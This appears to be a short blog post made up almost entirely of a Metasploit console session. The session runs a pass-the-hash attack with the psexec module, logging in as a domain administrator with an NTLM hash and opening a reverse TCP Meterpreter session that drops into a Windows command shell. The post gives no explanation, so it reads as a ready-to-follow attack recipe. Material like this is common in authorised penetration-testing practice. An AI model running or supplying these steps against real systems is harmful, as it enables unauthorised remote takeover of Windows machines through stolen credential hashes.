Pass The Hash Reverse Shell With Metasploit


root@kali:/usr/bin# ./msfconsole
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost
lhost =>
msf exploit(psexec) > set rhost
rhost =>
msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
msf exploit(psexec) > set smbuser administrator
smbuser => administrator
msf exploit(psexec) > set smbdomain test
smbdomain => test
msf exploit(psexec) > exploit

[*] Started reverse TCP handler on
[*] Connecting to the server…
[*] Authenticating to|test as user ‘administrator’…
[*] Selecting PowerShell target
[*] – Executing the payload…
[+] – Service start timed out, OK if running a command or non-service executable…
[*] Sending stage (957487 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-03-09 16:44:58 -0500

meterpreter > shell
Process 2212 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s